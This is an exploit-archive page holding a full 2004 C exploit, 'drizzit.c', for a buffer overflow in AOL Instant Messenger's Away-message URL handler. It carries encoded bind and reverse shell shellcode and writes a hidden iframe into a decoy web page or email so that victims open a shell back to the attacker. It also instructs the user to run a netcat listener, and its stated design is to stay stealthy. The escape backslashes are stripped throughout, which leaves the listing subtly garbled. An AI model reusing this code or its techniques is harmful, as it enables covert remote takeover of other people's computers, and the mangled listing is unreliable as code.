[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AOL Instant Messenger AIM "Away" Message Remote Exploit
# Published : 2004-09-02
# Author : John Bissell
# Previous Title : Trillian 0.74i Remote Buffer Overflow Exploit (MSN Module Bug)
# Next Title : Citadel/UX <= 6.23 Remote USER Directive Exploit (Private Version)
/* CAN-2004-0636 */
/*
* AIM Away Message Buffer Overflow Exploit
* Exploit by John Bissell A.K.A. HighT1mes
*
* Exploit:
* ========
* drizzit.c
*
* Vulnerable Software:
* ====================
* - AIM 5.5.3588
* - AIM 5.5.3590 Beta
* - AIM 5.5.3591
* - AIM 5.5.3595
* and a couple others versions...
*
* If you want to try other return addressees for other versions of
* AIM then edit the return address.. But the current one embedded
* will work for sure with all the AIM versions listed above.
*
* I used some of the metasploit shellcode for this exploit with some
* modifications to get this into stealth mode so it is harder to
* detect the attack. Since I'm using metasploit shellcode that means this
* exploit can be used on any NT type OS, like win2k, winnt, winxp across
* any service pack.. I don't know about SP2 though I haven't tested
* it yet.
*
* On a side note I pourposly did not include the download+exec shellcode
* even though I have it because I'm sick and tired of these little
* spam/adware bitchs messing peoples computers up for profit.. You can
* still download/upload through the shell to the victim. It just
* isn't automated like download+exec would be.
*
* In my opinion the reverse connect (-r option) is the most dangerous
* because you can encode your ip address and pick a port, and then
* when the victim visits the evil web page or email whatever.. then the
* attack will automatically open his AIM even its not already open and
* connect to you and then terminate the AIM process to be stealth so
* the victim doesn't know what him them.. As I remind people in the
* exploit usage you need to remember to use netcat to listen on a
* port you picked for the exploit to connect to...
*
* One reason I decided to include the generation of html code for
* this exploit is I noticed almost no puts small limits on the
* <IFRAME SRC=""> attribute. So when the victim connects to that
* page or reads that email depending on the browser or client,
* The exploit will execute.. IE 6.0 and Mozilla are
* affected by this problem as well as Outlook Express when the
* security settings are set to the Internet Zone.
*
* Excuse the sloppy commandline interface I just wanted to get
* this out to the public.
*
* [ Original advisory posted by Secunia and iDEFENSE. ]
*
* Greets:
* =======
* IsolationX, YpCat, DaPhire, route, #romhack,
* Taylor Hayes, Aria Giovanni, Anthony Rocha,
* InVerse, Deltaflame, Jenna Jameson, iDENFENSE,
* secunia, so1o, John Kerry, and many others...
*
* Compiler:
* =========
* Visual C++ 6.0
*
* To compile you first must add ws2_32.lib to the Object/librarys modules:
* text box under the Project -> Settings menu; then click on the link tab...
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
/* Exploit Data */
char injection_vector[] =
"x61x69x6Dx3Ax67x6Fx61x77x61x79x3Fx6Dx65x73x73x61"
"x67x65x3Dx41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41";
char bind_shellcode[] =
"xEBx26x23x38x3Bx41x41"
"x92x0fx29x12x41x41x41x41xD9xE1xD9x34x24x58x58x58"
"x58x80xE8xE7x31xC9x66x81xE9x97xFEx80x30x92x40xE2"
"xFAx7AxAAx92x92x92xD1xDFxD6x92x75xEBx54xEBx77xDB"
"x14xDBx36x3FxBCx7Bx36x88xE2x55x4Bx9Bx67x3Fx59x7F"
"x6ExA9x1CxDCx9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6C"
"x21x84xC5xC1xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6"
"x1Bx77x1BxCFx92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2"
"x8Ex3Fx19xCAx9Ax79x9Ex1FxC5xBExC3xC0x6Dx42x1Bx51"
"xCBx79x82xF8x9AxCCx93x7CxF8x98xCBx19xEFx92x12x6B"
"x94xE6x76xC3xC1x6DxA6x1Dx7Ax07x92x92x92xCBx1Bx96"
"x1Cx70x79xA3x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92"
"x6DxC7xB2xC5xC5xC5xC5xD5xC5xD5xC5x6DxC7x8Ex1Bx51"
"xA3x6DxC5xC5xFAx90x92xB0x83x1Bx74xF8x82xC4xC1x6D"
"xC7x8AxC5xC1x6DxC7x86xC5xC4xC1x6DxC7x82x1Bx50xF4"
"x13x7ExC6x92x1FxAExB6xA3x52xF8x87xCBx61x39x1Bx45"
"x54xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxEExB6xDA"
"x1BxEExB6xDEx1BxEExB6xC2x1FxD6xB6x82xC6xC2xC3xC3"
"xC3xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xA2x1Bx73x79"
"x9CxFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xBExC5x6DxC7x9Ex6D"
"xC7xBAxC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97"
"xEAx93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6"
"x19x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9F"
"x93x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4"
"x19x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3"
"x52x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52";
char reverse_shellcode[] =
"xEBx08x41x41x92x0fx29x12x41x41x41x41xD9xE1xD9x34"
"x24x58x58x58x58x80xE8xE7x31xC9x66x81xE9xACxFEx80"
"x30x92x40xE2xFAx7AxA2x92x92x92xD1xDFxD6x92x75xEB"
"x54xEBx7Ex6Bx38xF2x4Bx9Bx67x3Fx59x7Fx6ExA9x1CxDC"
"x9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6Cx21x84xC5xC1"
"xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6x1Bx77x1BxCF"
"x92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2x8Ex3Fx19xCA"
"x9Ax79x9Ex1FxC5xB6xC3xC0x6Dx42x1Bx51xCBx79x82xF8"
"x9AxCCx93x7CxF8x9AxCBx19xEFx92x12x6Bx96xE6x76xC3"
"xC1x6DxA6x1Dx7Ax1Ax92x92x92xCBx1Bx96x1Cx70x79xA3"
"x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92x6DxC7x8AxC5"
"xC5xC5xC5xD5xC5xD5xC5x6DxC7x86x1Bx51xA3x6DxFAxDF"
"xDFxDFxDFxFAx90x92xB0x83x1Bx73xF8x82xC3xC1x6DxC7"
"x82x17x52xE7xDBx1FxAExB6xA3x52xF8x87xCBx61x39x54"
"xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxCExB6xDAx1B"
"xCExB6xDEx1BxCExB6xC2x1FxD6xB6x82xC6xC2xC3xC3xC3"
"xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xBAx1Bx73x79x9C"
"xFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xB6xC5x6DxC7x9Ex6DxC7"
"xB2xC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97xEA"
"x93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6x19"
"x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9Fx93"
"x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4x19"
"x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3x52"
"x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52";
/* Function Prototypes */
void print_usage(char *prog_name);
unsigned char xor_data(unsigned char byte);
/* Function Code */
int main(int argc, char *argv[])
{
int i = 0;
int raw_num = 0;
unsigned long port = 1337; /* default port for bind and reverse attacks
*/
unsigned long encoded_port = 0;
unsigned long encoded_ip = 0;
unsigned char print_raw_exploit = 0;
unsigned char attack_mode = 2; /* bind attack by default */
char ip_addr[256];
char exploit[2048];
char str_num[16];
char *p1, *p2;
FILE *EXPLOIT_FP;
char outfile[512];
WSADATA wsa;
if (argc < 2) print_usage(argv[0]);
/* process commandline */
for (i = 0; i < argc; i++) {
if (argv[i][0] == '-') {
switch (argv[i][1]) {
case 'r':
/* reverse connect */
strncpy(ip_addr, argv[i+1], 20);
attack_mode = 1;
break;
case 'b':
/* bind */
attack_mode = 2;
break;
case 'p':
port = atoi(argv[i+1]);
/* port */
break;
case 'o':
print_raw_exploit = 1;
break;
case 'e':
strncpy(outfile, argv[i+1], 256);
}
}
}
/* initialize the socket library */
if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
printf("Error: Winsock didn't initialize!n");
exit(-1);
}
/* build exploit */
strncpy(exploit, injection_vector, strlen(injection_vector));
exploit[strlen(injection_vector)+1]=0; // tack on NULL byte
encoded_port = htonl(port);
encoded_port += 2;
if (attack_mode == 1) {
/* reverse connect attack */
reverse_shellcode[196] = (char) 0x90;
reverse_shellcode[197] = (char) 0x92;
reverse_shellcode[198] = xor_data((char)((encoded_port >> 16) & 0xff));
reverse_shellcode[199] = xor_data((char)((encoded_port >> 24) & 0xff));
p1 = strchr(ip_addr, '.');
strncpy(str_num, ip_addr, p1-ip_addr);
raw_num = atoi(str_num);
reverse_shellcode[191] = xor_data((char)raw_num);
p2 = strchr(p1+1, '.');
strncpy(str_num, ip_addr+(p1-ip_addr)+1, p2-p1);
raw_num = atoi(str_num);
reverse_shellcode[192] = xor_data((char)raw_num);
p1 = strchr(p2+1, '.');
strncpy(str_num, ip_addr+(p2-ip_addr)+1, p1-p2);
raw_num = atoi(str_num);
reverse_shellcode[193] = xor_data((char)raw_num);
p2 = strrchr(ip_addr, '.');
strncpy(str_num, p2+1, 5);
raw_num = atoi(str_num);
reverse_shellcode[194] = xor_data((char)raw_num);
strncat(exploit, reverse_shellcode, sizeof(reverse_shellcode));
}
if (attack_mode == 2) {
/* bind attack */
bind_shellcode[204] = (char) 0x90;
bind_shellcode[205] = (char) 0x92;
bind_shellcode[206] = xor_data((char)((encoded_port >> 16) & 0xff));
bind_shellcode[207] = xor_data((char)((encoded_port >> 24) & 0xff));
strncat(exploit, bind_shellcode, sizeof(bind_shellcode));
}
WSACleanup();
/* output exploit */
if (print_raw_exploit == 1) {
printf("%s", exploit);
}
else {
if ((EXPLOIT_FP = fopen(outfile, "w")) == NULL) {
fprintf(stderr, "Error: Exploit file can't be created!n");
exit(-1);
}
fprintf(EXPLOIT_FP, "<html>n");
fprintf(EXPLOIT_FP, "<head>n");
fprintf(EXPLOIT_FP, "<title>Hey d00d!</title>n");
fprintf(EXPLOIT_FP, "</head>n");
fprintf(EXPLOIT_FP, "<body>n");
fprintf(EXPLOIT_FP, "Some fake web page or email...n");
fprintf(EXPLOIT_FP, "<iframe width=0 height=0 border=0 src="");
fprintf(EXPLOIT_FP, "%s", exploit);
fprintf(EXPLOIT_FP, "">n</iframe>n");
fprintf(EXPLOIT_FP, "</body>n");
fprintf(EXPLOIT_FP, "<html>n");
fclose(EXPLOIT_FP);
/* im to lazy to make a macro for this banner :P */
printf(" +-------------------------------------------------+n");
printf(" | AIM Exploit by John Bissell A.K.A. HighT1mes |n");
printf(" | AIM Away Message Buffer Overflow Exploit |n");
printf(" +-------------------------------------------------+nn");
printf(" Exploit created!nn");
printf(" Remember if you use the -r option to have netcat listeningn");
printf(" on the port you are using for the attack so the victim willn");
printf(" be able to connect to you when exploited...nn");
printf(" Example:n");
printf("tnc.exe -l -p %d", port);
}
return(EXIT_SUCCESS);
}
void print_usage(char *prog_name)
{
printf(" +-------------------------------------------------+n");
printf(" | AIM Exploit by John Bissell A.K.A. HighT1mes |n");
printf(" | AIM Away Message Buffer Overflow Exploit |n");
printf(" +-------------------------------------------------+nn");
printf(" Exploit Usage:n");
printf("t%s -r your_ip | -b [-p port] -o | -e outfilenn", prog_name);
printf(" Parameters:n");
printf("t-r your_ip or -bt Choose -r for reverse connect attack modentttt
and choose -b for a bind attack. By defaultntttt if you don't specify -r or
-b then a bindntttt attack will be generated.nn");
printf("t-p (optional)tt This option will allow you to change the port ntttt
used for a bind or reverse connect attack.ntttt If the attack mode is bind
then thentttt victim will open the -p port. If the attackntttt mode
is reverse connect then the port yountttt specify will be the one you want
to listenntttt on so the victim can connect to yountttt right away.nn");
printf("t-o or -e outfilett Here you specify the output method...ntttt If
you would like output go straight tontttt standerd output then specify the
-o optionntttt otherwise give the path of where you want tontttt create
the exploit file which is basicallyntttt a simple html file. The -o option
is useful ifntttt you want to test the exploit url inntttt different
ways.nn");
printf(" Examples:n");
printf("t%s -r 68.6.47.62 -p 8888 -e c:\exploit.htmln", prog_name);
printf("t%s -b -p 1542 -e c:\new_exploit.htmln", prog_name);
printf("t%s -b -on", prog_name);
printf("t%s -r 68.6.47.62 -onn", prog_name);
printf(" Remember if you use the -r option to have netcat listeningn");
printf(" on the port you are using for the attack so the victim willn");
printf(" be able to connect to you when exploited...nn");
printf(" Example:n");
printf("tnc.exe -l -p 8888");
exit(-1);
}
unsigned char xor_data(unsigned char byte)
{
return(byte ^ 0x92);
}
// www.Syue.com [2004-09-02]